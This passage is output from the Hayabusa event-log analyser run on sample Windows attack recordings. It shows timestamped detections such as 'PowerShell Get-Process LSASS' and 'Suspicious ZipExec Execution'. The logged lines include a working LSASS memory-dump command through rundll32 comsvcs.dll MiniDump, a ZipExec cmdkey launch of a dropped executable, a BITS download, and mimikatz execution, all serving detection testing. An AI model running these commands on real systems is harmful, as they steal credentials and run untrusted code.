H:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location I:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location J:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location 
K:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location L:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location M:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location N:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location O:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location P:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS 
dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Q:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location R:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location S:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location T:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location U:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location 
V:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location W:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location X:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Y:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Z:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location ..,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS 
dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location \,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Read-Host 'Press Enter to continue...' | Out-Null,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$this.ServiceName,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[System.Management.ManagementDateTimeConverter]::ToDateTime($args[0]),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,[System.Management.ManagementDateTimeConverter]::ToDmtfDateTime($args[0]),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\vtnr8kff.dmp full;Wait-Process -Id (Get-Process rundll32).id",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. 
All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" NestedModules=""Microsoft.PowerShell.Commands.Management.dll"" HelpInfoURI = 'http://go.microsoft.com/fwlink/?linkid=285756' CmdletsToExport=@(""Add-Content"", ""Clear-Content"", ""Clear-ItemProperty"", ""Join-Path"", ""Convert-Path"", ""Copy-ItemProperty"", ""Get-EventLog"", ""Clear-EventLog"", ""Write-EventLog"", ""Limit-EventLog"", ""Show-EventLog"", ""New-EventLog"", ""Remove-EventLog"", ""Get-ChildItem"", ""Get-Content"", ""Get-ItemProperty"", ""Get-WmiObject"", ""Invoke-WmiMethod"", ""Move-ItemProperty"", ""Get-Location"", ""Set-Location"", ""Push-Location"", ""Pop-Location"", ""New-PSDrive"", ""Remove-PSDrive"", ""Get-PSDrive"", ""Get-Item"", ""New-Item"", ""Set-Item"", ""Remove-Item"", ""Move-Item"", ""Rename-Item"", ""Copy-Item"", ""Clear-Item"", ""Invoke-Item"", ""Get-PSProvider"", ""New-ItemProperty"", ""Split-Path"", ""Test-Path"", ""Get-Process"", ""Stop-Process"", ""Wait-Process"", ""Debug-Process"", ""Start-Process"", ""Remove-ItemProperty"", ""Remove-WmiObject"", ""Rename-ItemProperty"", ""Register-WmiEvent"", ""Resolve-Path"", ""Get-Service"", ""Stop-Service"", ""Start-Service"", ""Suspend-Service"", ""Resume-Service"", ""Restart-Service"", ""Set-Service"", ""New-Service"", ""Set-Content"", ""Set-ItemProperty"", ""Set-WmiInstance"", ""Get-Transaction"", ""Start-Transaction"", ""Complete-Transaction"", ""Undo-Transaction"", ""Use-Transaction"", ""New-WebServiceProxy"", ""Get-HotFix"", ""Test-Connection"", ""Enable-ComputerRestore"", ""Disable-ComputerRestore"", ""Checkpoint-Computer"", ""Get-ComputerRestorePoint"", ""Restart-Computer"", ""Stop-Computer"", ""Restore-Computer"", ""Add-Computer"", ""Remove-Computer"", ""Test-ComputerSecureChannel"", ""Reset-ComputerMachinePassword"", ""Rename-Computer"", ""Get-ControlPanelItem"", ""Show-ControlPanelItem"") 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.427 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; value=""lsass""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.427 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; value=""rundll32""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: cscript.exe //e:jscript testme.js | Process: C:\Windows\System32\cscript.exe | User: 
LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x779c2 | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,WSF/JSE/JS/VBA/VBE File Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 15156 | PGUID: 00247C92-94D6-6171-0000-00103F5A967B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,LatMov,Remote Desktop Protocol Use Mstsc,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mstsc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:03.398 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.523 
+09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.549 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" | Process: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 17264 | PGUID: 00247C92-94E0-6171-0000-00107424987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,high,Exec,Script Interpreter Execution From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Renamed Binary,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Impact,Run from a Zip File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_from_zip.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 
+09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 19000 | PGUID: 00247C92-94E0-6171-0000-0010B84D987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" | Process: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run | LID: 0x779c2 | PID: 26868 | PGUID: 00247C92-94E0-6171-0000-00104337987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination 
C:\Users\bits.ps1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Join-Path): ""Join-Path"" ParameterBinding(Join-Path): name=""Path""; value=""C:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer"" ParameterBinding(Join-Path): name=""ChildPath""; value=""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""{8FA5064B-8479-4c5c-86EA-0D311FE48875}"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. 
All rights reserved."" ModuleVersion=""1.0.0.0"" PowerShellVersion=""2.0"" CLRVersion=""2.0"" NestedModules=""Microsoft.BackgroundIntelligentTransfer.Management"" FormatsToProcess=""BitsTransfer.Format.ps1xml"" RequiredAssemblies=Join-Path $psScriptRoot ""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll"" CmdletsToExport=""Add-BitsFile"",""Complete-BitsTransfer"",""Get-BitsTransfer"",""Remove-BitsTransfer"",""Resume-BitsTransfer"",""Set-BitsTransfer"",""Start-BitsTransfer"",""Suspend-BitsTransfer"" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-BitsTransfer): ""Start-BitsTransfer"" ParameterBinding(Start-BitsTransfer): name=""Priority""; value=""foreground"" ParameterBinding(Start-BitsTransfer): name=""Source""; value=""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md"" ParameterBinding(Start-BitsTransfer): name=""Destination""; value=""C:\Users\bits.ps1""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is 
""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:38:37.100 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: BITS Transfer | URL: 
https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: mimikatz.exe | Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1f4c65f | PID: 2032 | PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Hash: SHA1=D241DF7B9D2EC0B8194751CD5CE153E27CC40FA4,MD5=A3CB3B02A683275F7E0A0F8A9A5C9E07,SHA256=31EB1DE7E840A342FD468E558E5AB627BCB4C542A8FE01AEC4D5BA01D539A0FC,IMPHASH=DBDEA7B557F0E6B5D9E18ABE9CE5220A",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 